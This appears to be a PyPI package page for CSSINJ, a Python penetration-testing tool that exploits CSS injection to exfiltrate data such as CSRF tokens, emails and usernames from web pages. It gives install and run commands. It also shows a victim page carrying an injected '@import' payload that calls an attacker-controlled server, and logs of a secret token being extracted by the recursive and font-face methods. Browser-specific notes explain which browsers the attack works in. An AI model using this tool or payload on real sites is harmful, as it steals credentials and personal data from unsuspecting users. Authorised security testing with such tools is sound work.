Skip to main content

A python tools to exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications.

Project description


CSSINJ

  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

About

CSSINJ is a penetration testing tool that exploits CSS injection vulnerabilities to exfiltrate sensitive information from web applications. This tool is designed for security professionals to assess the security posture of web applications by demonstrating how CSS can be used to extract data covertly.

Installation

To install CSSINJ, run the following command:

pip install cssinj

Now you’re ready to use CSSINJ!

Usage

python3 -m cssinj [-h] -H HOSTNAME -p PORT [-e ELEMENT] [-a ATTRIBUT] [-d] [-m {recusive,font-face}] [-o OUTPUT]

Options

Option Description
-h, --help Show help message and exit
-H, --hostname Attacker hostname or IP address
-p, --port Port number of the attacker
-e, --element HTML element to extract specific data
-a, --attribut Specify an element Attribute Selector for exfiltration
-d, --details Show detailed logs of the exfiltration process, including extracted data
-m, --method Specify the type of exfiltration (recursive or font-face)
-t, --timeout Timeout in seconds before considering exfiltration complete (default: 3.0)
-o, --output File to store the exfiltrated data in JSON format

Example

Victim's View :

<h1>Welcome on my page !</h1>
<input type="text" id="username" value="admin" disabled>
<input type="email" id="email" value="admin@admin.XX" disabled>
<input type="text" class="csrf" value="MySecretAdminToken" hidden>
<img src="XXXXXXXXXXX.XX">
...
<style>
  @import url('//localhost:5005/start');
</style>
...

Recursive attack

Using a specific HTML identifier :
~ python3 -m cssinj inject -H 127.0.0.1 -p 5005 -e input
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : MySecretAdminToken
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : admin@admin.XX
[2025-03-11 03:06:49]  [1] - The value exfiltrated from input is : admin
Using a specific CSS attribute selector and a generic HTML identifier:
~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e * -a src
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-03-11 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-03-11 03:06:49] 🌐 Connection from ::1
[2025-03-11 03:06:49] ⚙️ ID : 1
[2025-03-11 03:06:49]  [1] - The src exfiltrated from * is : XXXXXXXXXXX.XX

Font-face attack

~ python3 -m cssinj -H 127.0.0.1 -p 5005 -e h1 --method font-face
  _____   _____   _____  _____  _   _       _     _____  __     __
 / ____| / ____| / ____||_   _|| \ | |     | |   |  __ \ \ \   / /
| |     | (___  | (___    | |  |  \| |     | |   | |__) | \ \_/ /
| |      \___ \  \___ \   | |  | . ` | _   | |   |  ___/   \   /
| |____  ____) | ____) | _| |_ | |\  || |__| | _ | |        | |
 \_____||_____/ |_____/ |_____||_| \_| \____/ (_)|_|        |_|

[2025-05-21 03:06:49] 🛠️ Attacker's server started on 127.0.0.1:5005
[2025-05-21 03:06:49] 🌐 Connection from 127.0.0.1
[2025-05-21 03:06:49] ⚙️ ID : 1
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 :  
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : e
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : W
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : l
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : c
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : o
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : m
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : n
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : y
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : p
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : a
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : g
[2025-05-21 03:06:49] 🔎 [1] - Exfiltrating element 0 : !

Browser-Specific Behavior

The success of CSS injection attacks using @import depends on the browser's handling of CSS imports:

  • Chromium-based browsers (Chrome, Edge, Brave, etc.) allow recursive CSS imports and will process the injected styles, making them vulnerable to exfiltration techniques using @import.

  • Firefox, however, handles @import differently:

    • Unlike Chromium-based browsers, Firefox processes all @import rules before applying any styles.
    • As a result, the attack fails because the browser never processes the CSS selectors, preventing data exfiltration.
    • This behavior causes an infinite loop where the browser keeps waiting for a CSS update that never happens.

This difference in behavior makes Chromium-based browsers more susceptible to CSS injection exfiltration, while Firefox provides better protection against such attacks.

Todo

  • General :

    • Add error Handler
      • File error Handler
    • Add test
    • Edit Terminal
  • Injection :

    • Add timeout for font-face exfiltration
  • Complete Exfiltration (Blind):

    • 0. Complete dom objects
    • 1. Get Structure of the HTML (Tags)
    • 2. Get all Attributs for each Element
    • 3. Get all value for each Attributs
    • 4. Get text using font-face exfiltration

Disclaimer

This tool is intended only for ethical hacking and security research. Unauthorized use on systems without explicit permission is illegal. The developer is not responsible for any misuse of this tool.

Author

CSSINJ was developed by DonAsako.

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

cssinj-0.2.1.tar.gz (50.5 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

cssinj-0.2.1-py3-none-any.whl (39.6 kB view details)

Uploaded Python 3

File details

Details for the file cssinj-0.2.1.tar.gz.

File metadata

  • Download URL: cssinj-0.2.1.tar.gz
  • Upload date:
  • Size: 50.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for cssinj-0.2.1.tar.gz
Algorithm Hash digest
SHA256 40bf592a86615cb2e98f662d1723c828e6dd768b9bf26ec970ae245302619ca6
MD5 774b81d0377ddf134e4dd6d96abb2fc1
BLAKE2b-256 42ae550a8d6f4de3a1766b1a32ee87fff35714e31b155d05cd3ae161d91c9edc

See more details on using hashes here.

Provenance

The following attestation bundles were made for cssinj-0.2.1.tar.gz:

Publisher: publish-to-pypi.yml on DonAsako/CSSinj

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file cssinj-0.2.1-py3-none-any.whl.

File metadata

  • Download URL: cssinj-0.2.1-py3-none-any.whl
  • Upload date:
  • Size: 39.6 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for cssinj-0.2.1-py3-none-any.whl
Algorithm Hash digest
SHA256 7b7e54dec9865be1de603d1591121cbd1fec7c47216c219e3e6b5f80a4edf1ff
MD5 1f875b28e652f29a1934e92274926c15
BLAKE2b-256 6cfe1b4643c0d1e6c31cdcf7f4a0751cdf0a27154875a8cb08d7772307fd0ee5

See more details on using hashes here.

Provenance

The following attestation bundles were made for cssinj-0.2.1-py3-none-any.whl:

Publisher: publish-to-pypi.yml on DonAsako/CSSinj

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page